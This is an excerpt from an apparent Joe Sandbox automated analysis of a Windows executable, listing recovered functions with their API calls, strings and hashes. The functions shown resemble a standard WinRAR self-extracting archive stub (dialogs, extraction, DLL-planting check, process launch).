_memcmp.LIBVCRUNTIME ref: 00598A08

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 968254cfbce95c34411c4373d27fae51887c87cfe38b7934a2f54960df719833
Instruction ID: 557f5dbef42310b474c37d521ff30c10c8ff5e6105ea59a47854d973fae9d10e
Opcode Fuzzy Hash: 968254cfbce95c34411c4373d27fae51887c87cfe38b7934a2f54960df719833
Instruction Fuzzy Hash: 24822B70904246AEDF25DF74C895BFEBFB9BF56300F0844BAE8599B142DB315A48CB60

Function 005AAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005AAEE5

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

Strings

LICENSEDLG, xrefs: 005AB771
winrarsfxmappingfile.tmp, xrefs: 005AB2BC
__tmp_rar_sfx_access_check_%u, xrefs: 005AB1CB
"%s"%s, xrefs: 005AB423
C:\Users\user\Desktop, xrefs: 005AB2DF
<, xrefs: 005AB29A
-el -s2 "-d%s" "-sp%s", xrefs: 005AB281
STARTDLG, xrefs: 005AAF04
@, xrefs: 005AB2A7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: 19a8c7231c51c87d74a2ab55344dcd6ff88708cca4ed2a8128378611b3276dbe
Instruction ID: cc1c0892c359244210326bdf6f42dd6effff127f9719b115391248e533984165
Opcode Fuzzy Hash: 19a8c7231c51c87d74a2ab55344dcd6ff88708cca4ed2a8128378611b3276dbe
Instruction Fuzzy Hash: 3E42D6B1944245BEEF21ABA49C4EFBE7F7CBB62704F000056F245E61D2DB784948DBA1

Function 005A00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 005A00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005A00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005A0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 005A03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005A03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A0402
ReadFile.KERNEL32(00000000,?,00007FFE,005C3BA4,00000000), ref: 005A0421
CloseHandle.KERNEL32(00000000), ref: 005A0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 005A048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 005A04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 005A0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 005A054A

Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2

_swprintf.LIBCMT ref: 005A05BE
_swprintf.LIBCMT ref: 005A060A

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

AllocConsole.KERNEL32 ref: 005A0612
GetCurrentProcessId.KERNEL32 ref: 005A061C
AttachConsole.KERNEL32(00000000), ref: 005A0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 005A0649
WriteConsoleW.KERNEL32(00000000), ref: 005A0650
Sleep.KERNEL32(00002710), ref: 005A065B
FreeConsole.KERNEL32 ref: 005A0661
ExitProcess.KERNEL32 ref: 005A0669

Strings

p@\, xrefs: 005A0344
T?\, xrefs: 005A02C0
SetDllDirectoryW, xrefs: 005A00F0
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 005A05F8
DXGIDebug.dll, xrefs: 005A0169, 005A04D3
X@\, xrefs: 005A0339
0A\, xrefs: 005A0391
(@\, xrefs: 005A0323
X>\, xrefs: 005A0252
@>\, xrefs: 005A0247
|<\, xrefs: 005A01AC
P<\, xrefs: 005A019C
l<\, xrefs: 005A055C
dwmapi.dll, xrefs: 005A0581
?\, xrefs: 005A02AA
<?\, xrefs: 005A02B5
(>\, xrefs: 005A023C
4=\, xrefs: 005A01EC
\A\, xrefs: 005A03A7
`=\, xrefs: 005A01FC
D=\, xrefs: 005A01F4
<\, xrefs: 005A018C
p>\, xrefs: 005A025D
kernel32, xrefs: 005A00DD
DA\, xrefs: 005A039C
?\, xrefs: 005A0302
@@\, xrefs: 005A032E
x=\, xrefs: 005A0204
p?\, xrefs: 005A02CB
8<\, xrefs: 005A0194
T;\, xrefs: 005A0154
uxtheme.dll, xrefs: 005A058B
SetDefaultDllDirectories, xrefs: 005A0121
>\, xrefs: 005A0289

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <\$ ?\$(>\$(@\$0A\$4=\$8<\$<?\$@>\$@@\$D=\$DA\$DXGIDebug.dll$P<\$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;\$T?\$X>\$X@\$\A\$`=\$dwmapi.dll$kernel32$l<\$p>\$p?\$p@\$uxtheme.dll$x=\$|<\$>\$?\
API String ID: 1201351596-3267786495
Opcode ID: fb6ef2065fb3ddcfb16fed4245bb139ca077307ac01c25b2742bb7201ee461f2
Instruction ID: 0d95be39db9b674373eef6dc08a083882979c5a86292dd606ee27deedb27d007
Opcode Fuzzy Hash: fb6ef2065fb3ddcfb16fed4245bb139ca077307ac01c25b2742bb7201ee461f2
Instruction Fuzzy Hash: 78D15FB15583899FD720AF90D84DF9FBFE8BF85704F40891DF589A6180D7B48A488F62

Function 005ABDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 005ABDFA

Part of subcall function 005AAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 005AAAFE

SetWindowTextW.USER32(?,?), ref: 005AC127
_wcsrchr.LIBVCRUNTIME ref: 005AC2B1
GetDlgItem.USER32(?,00000066), ref: 005AC2EC
SetWindowTextW.USER32(00000000,?), ref: 005AC2FC
SendMessageW.USER32(00000000,00000143,00000000,005DA472), ref: 005AC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005AC335

Strings

<br>, xrefs: 005AC08A
Software\Microsoft\Windows\CurrentVersion, xrefs: 005AC1D0
%s.%d.tmp, xrefs: 005ABFF6
ProgramFilesDir, xrefs: 005AC1FB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 78c199d0c30944877ac9a70ba9ef629da315363fc78cc98985ac86c6636a86ec
Instruction ID: e75bf0314ec59b3b54df90b68e43bdb3c0f47d31ff2a29196b49b8fbd20a5b06
Opcode Fuzzy Hash: 78c199d0c30944877ac9a70ba9ef629da315363fc78cc98985ac86c6636a86ec
Instruction Fuzzy Hash: 0FE15E76D04119AADF25DBA0DC49EEF7FBCBF5A310F0040A6E509E2091EB749A84DB60

Function 0059D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0059D346
_wcschr.LIBVCRUNTIME ref: 0059D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0059D328,?), ref: 0059D382
__fprintf_l.LIBCMT ref: 0059D873

Part of subcall function 005A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0059B652,00000000,?,?,?,00010406), ref: 005A1396

Strings

*messages***, xrefs: 0059D4D3
$9\, xrefs: 0059D6AF
RTL, xrefs: 0059D838
a, xrefs: 0059D4EF
R, xrefs: 0059D4E5
,, xrefs: 0059D8AE
$%s:, xrefs: 0059D856
, xrefs: 0059D67A
@%s:, xrefs: 0059D85D, 0059D869
*messages***, xrefs: 0059D49A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9\$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-575384938
Opcode ID: 761030863f3429a63dcfc30040963867f52948f09298206b6f2c7738ee6c976e
Instruction ID: 79d7f2c6927bc7889f256dc67020ea0e3d2c2c48ea222aa116d5e7669b2cbc0d
Opcode Fuzzy Hash: 761030863f3429a63dcfc30040963867f52948f09298206b6f2c7738ee6c976e
Instruction Fuzzy Hash: 7C12A0B190021A9ADF24EFA4DC85BEEBFB5FF44304F104569F506B7192EB70AA44CB64

Function 005ACB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
Part of subcall function 005AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
Part of subcall function 005AAC74: IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
Part of subcall function 005AAC74: TranslateMessage.USER32(?), ref: 005AACB8
Part of subcall function 005AAC74: DispatchMessageW.USER32(?), ref: 005AACC2

GetDlgItem.USER32(00000068,005EECB0), ref: 005ACB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,005AA632,00000001,?,?,005AAECB,005C4F88,005EECB0), ref: 005ACB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 005ACBA1
SendMessageW.USER32(00000000,000000C2,00000000,005C35B4), ref: 005ACBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 005ACBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 005ACBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 005ACC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 005ACC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 005ACC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 005ACC67
SendMessageW.USER32(00000000,000000C2,00000000,005C431C), ref: 005ACC76

Strings

\, xrefs: 005ACBCF

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: ac5c5b4d9de162685457ddbe0dd6872e9ced2710779dfd6577c3badb7f7c5c78
Instruction ID: d6d43fcfa2409bf116f6ba5d06b0ef455a98bbc7946f6861cbf05b9686ad1357
Opcode Fuzzy Hash: ac5c5b4d9de162685457ddbe0dd6872e9ced2710779dfd6577c3badb7f7c5c78
Instruction Fuzzy Hash: 7831AEB214A342BBE311DB20EC4AFAB7FACEB92714F000509F651D6191DB694A08E776

Function 005ACE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 005ACF54
ShowWindow.USER32(?,00000000), ref: 005ACF93
GetExitCodeProcess.KERNEL32(?,?), ref: 005ACFCF
CloseHandle.KERNEL32(?), ref: 005ACFF5
ShowWindow.USER32(?,00000001), ref: 005AD084

Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2

Strings

.exe, xrefs: 005ACFFF
, xrefs: 005ACEA2
.inf, xrefs: 005ACF10

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 881cbc2a7debb90ef45fa3fc7b2b2e8e69fc388f04f5a29232d608dadfdec3fe
Instruction ID: 4e62c5aff3f13ddc6eea03a173b659630fc0e2e1628ee41ccbd14a585e110cf6
Opcode Fuzzy Hash: 881cbc2a7debb90ef45fa3fc7b2b2e8e69fc388f04f5a29232d608dadfdec3fe
Instruction Fuzzy Hash: 1861D4704043809EDB31AF24D808AAFBFF9BF97340F04481AF5C697251E7719989DBA2

Function 005BA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B4E35,005B4E35,?,?,?,005BA2A9,00000001,00000001,3FE85006), ref: 005BA0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005BA2A9,00000001,00000001,3FE85006,?,?,?), ref: 005BA138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005BA232
__freea.LIBCMT ref: 005BA23F

Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A

__freea.LIBCMT ref: 005BA248
__freea.LIBCMT ref: 005BA26D

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 19c98f742ff07d012fade36dc34a08f881b2c0e6911a8e78e80efd2429c0ffb5
Instruction ID: 89c8eae216a4925b214c5a5654f24e0c3134aa082b4e7379392a0dfe6681fc53
Opcode Fuzzy Hash: 19c98f742ff07d012fade36dc34a08f881b2c0e6911a8e78e80efd2429c0ffb5
Instruction Fuzzy Hash: F651CE72610216AFEB259E74CC46EFBBFAAFB84750F144629FD05D6140EB35EC40C6A2

Function 005AA2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 005AA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 005AA315

Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 005AA305

Strings

EDIT, xrefs: 005AA2E9, 005AA2F4, 005AA301
@Ut, xrefs: 005AA315

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: b86c51799f0487dcedc34cdeb33795673fa1a583f79884be2edea918aaf14e29
Instruction ID: 2a52bca6d02ef38ff9b5bc4c13061a97424a2b1f8ff3edb0d320575e4101e239
Opcode Fuzzy Hash: b86c51799f0487dcedc34cdeb33795673fa1a583f79884be2edea918aaf14e29
Instruction Fuzzy Hash: 06F08272A016287BEB205664AC09FAF7BACAF47B50F040456BD05E2180DB649945C6F6

Function 005AA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2

OleInitialize.OLE32(00000000), ref: 005AA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 005AA385
SHGetMalloc.SHELL32(005D8430), ref: 005AA38F

Strings

3Qo, xrefs: 005AA366
riched20.dll, xrefs: 005AA33D

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: b31584012d1159afcf7f5490c630dd4a38b2bf6b5dfa5af43d480e441d3f43d6
Instruction ID: d2721bd257549f15193a9edcfd617c9a14d6c41e76f899825bdfe4ac5df4f180
Opcode Fuzzy Hash: b31584012d1159afcf7f5490c630dd4a38b2bf6b5dfa5af43d480e441d3f43d6
Instruction Fuzzy Hash: A2F0ECB1D4020AABDB10AF9998499EFFFFCFF95705F00415AE814E2240DBB85649CBA1

Function 005999B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,005978AD,?,00000005,?,00000011), ref: 00599A4C
GetLastError.KERNEL32(?,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,005978AD,?,00000005,?), ref: 00599A8E
GetLastError.KERNEL32(?,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599ADB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: c66f1a5902dce5905966a499821c084c3f33bdf2a303bec2a66b68f2b36f599d
Instruction ID: 1fa3bf298eac35e41f29ef7fb3968269fec1e68bd1d27ab84d39db3254010a97
Opcode Fuzzy Hash: c66f1a5902dce5905966a499821c084c3f33bdf2a303bec2a66b68f2b36f599d
Instruction Fuzzy Hash: 27413371544B466FEB208B28CC0ABDABFD4FB45324F10071DF9E4961D1E7B5A988CBA1

Function 005AAC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
TranslateMessage.USER32(?), ref: 005AACB8
DispatchMessageW.USER32(?), ref: 005AACC2

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: cc09e6910d1bbfa99fc6f5fdeff926757d0be96f08674bc9c81f92d5b618a7c1
Instruction ID: d190fa610cca4f7d70d57e5733a4415757cca4868119e6cdd41b51f2099e59ee
Opcode Fuzzy Hash: cc09e6910d1bbfa99fc6f5fdeff926757d0be96f08674bc9c81f92d5b618a7c1
Instruction Fuzzy Hash: 85F0BDB290212AAB9B209FE6DC4CDFF7F6CEE16261B404415F515D2110EF28D909DBB1

Function 005B76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\5Ixz5yVfS7.exe,00000104), ref: 005B76FD
_free.LIBCMT ref: 005B77C8
_free.LIBCMT ref: 005B77D2

Strings

